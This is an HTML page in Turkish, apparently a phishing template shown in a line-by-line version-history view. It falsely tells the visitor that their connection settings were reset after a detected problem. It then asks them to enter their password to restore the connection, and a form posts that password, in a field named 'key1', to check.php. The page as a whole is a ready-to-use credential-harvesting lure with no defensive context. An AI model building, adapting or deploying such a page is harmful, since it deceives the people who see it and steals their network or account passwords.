2019-05-20 19:11:39 -06:00
|
|
|
|
<!DOCTYPE html>
|
2020-05-25 14:32:31 -06:00
|
|
|
|
<html lang="tr">
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
|
|
|
|
<head>
|
|
|
|
|
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
|
|
|
|
|
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
2019-05-20 19:11:39 -06:00
|
|
|
|
<style>
|
|
|
|
|
body {
|
|
|
|
|
margin: 0px;
|
|
|
|
|
background-color: transparent;
|
|
|
|
|
overflow: hidden;
|
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.main-frame-text-error {
|
|
|
|
|
text-align: left;
|
|
|
|
|
color: #7F7F7F;
|
|
|
|
|
font-size: 18px;
|
|
|
|
|
margin-top: 20px;
|
|
|
|
|
padding-left: 5%;
|
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.main-frame-text {
|
|
|
|
|
padding-left: 10%;
|
|
|
|
|
padding-right: 10%;
|
|
|
|
|
color: #74797b;
|
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.main-frame-over-input-text {
|
|
|
|
|
padding-left: 10%;
|
|
|
|
|
padding-right: 10%;
|
|
|
|
|
color: #74797b;
|
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.table-div {
|
|
|
|
|
padding-left: 10%;
|
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.table-input {
|
|
|
|
|
width: 400;
|
|
|
|
|
border-collapse: collapse;
|
|
|
|
|
border-spacing: 0;
|
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.table-data-1 {
|
|
|
|
|
border-width: 1px 1px 1px 1px;
|
|
|
|
|
border-style: solid;
|
|
|
|
|
border-color: #CBCBCD;
|
|
|
|
|
background-color: #eeeeee;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
.table-white {
|
|
|
|
|
background-color: white;
|
|
|
|
|
color: #7F7F7F;
|
|
|
|
|
font-size: 14px;
|
|
|
|
|
padding-left: 10px;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
.table-image {
|
|
|
|
|
margin-left: 5px;
|
2020-05-25 14:44:19 -06:00
|
|
|
|
margin-top: 2px;
|
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.input-pass {
|
|
|
|
|
width: 100%;
|
|
|
|
|
height: 100%;
|
|
|
|
|
padding: 0px;
|
|
|
|
|
}
|
2020-05-25 14:44:19 -06:00
|
|
|
|
|
2019-05-20 19:11:39 -06:00
|
|
|
|
.confirmbtn {
|
|
|
|
|
-moz-border-radius: 5px;
|
|
|
|
|
-webkit-border-radius: 5px;
|
|
|
|
|
border-radius: 5px;
|
|
|
|
|
width: 100%;
|
|
|
|
|
height: 100%;
|
|
|
|
|
background: -webkit-gradient(linear, left top, left bottom, from(#80c1f6), to(#50b1fe));
|
|
|
|
|
background: -moz-linear-gradient(top, #80c1f6, #50b1fe);
|
|
|
|
|
background: -o-linear-gradient(top, #80c1f6, #50b1fe);
|
|
|
|
|
filter: progid: DXImageTransform.Microsoft.Gradient(StartColorStr='#80c1f6', EndColorStr='#50b1fe', GradientType=0);
|
|
|
|
|
padding: 0px;
|
|
|
|
|
}
|
|
|
|
|
</style>
|
|
|
|
|
|
|
|
|
|
</head>
|
|
|
|
|
|
|
|
|
|
<body>
|
|
|
|
|
<p class="main-frame-text-error">Bağlantı ayarlarınız sıfırlandı!</p>
|
|
|
|
|
<p class="main-frame-text">Bağlantınızda bir sorun algılandı ve bağlantı ayarlarınız sıfırlandı</p>
|
|
|
|
|
<p class="main-frame-over-input-text">Bağlantınızı geri getirmek için şifrenizi giriniz:</p>
|
|
|
|
|
<div class="table-div">
|
|
|
|
|
<table class="table-input">
|
|
|
|
|
<tbody>
|
|
|
|
|
<tr>
|
|
|
|
|
<td class="table-data-1">
|
|
|
|
|
<img src="images/password.png" class="table-image">
|
|
|
|
|
</td>
|
|
|
|
|
<td class="table-data-1 table-white">
|
|
|
|
|
<p>Şifre</p>
|
|
|
|
|
</td>
|
|
|
|
|
<form id="form1" name="form1" method="POST" action="check.php">
|
|
|
|
|
<td class="table-data-1">
|
|
|
|
|
<input name="key1" type="password" class="input-pass" />
|
|
|
|
|
</td>
|
|
|
|
|
<td class="table-data-1">
|
|
|
|
|
<input name="Confirm" class="confirmbtn" type="submit" value="Onayla" />
|
|
|
|
|
</td>
|
|
|
|
|
|
|
|
|
|
</form>
|
|
|
|
|
</tr>
|
|
|
|
|
</tbody>
|
|
|
|
|
|
|
|
|
|
</table>
|
|
|
|
|
</div>
|
|
|
|
|
|
|
|
|
|
</body>
|
|
|
|
|
|
|
|
|
|
</html>
|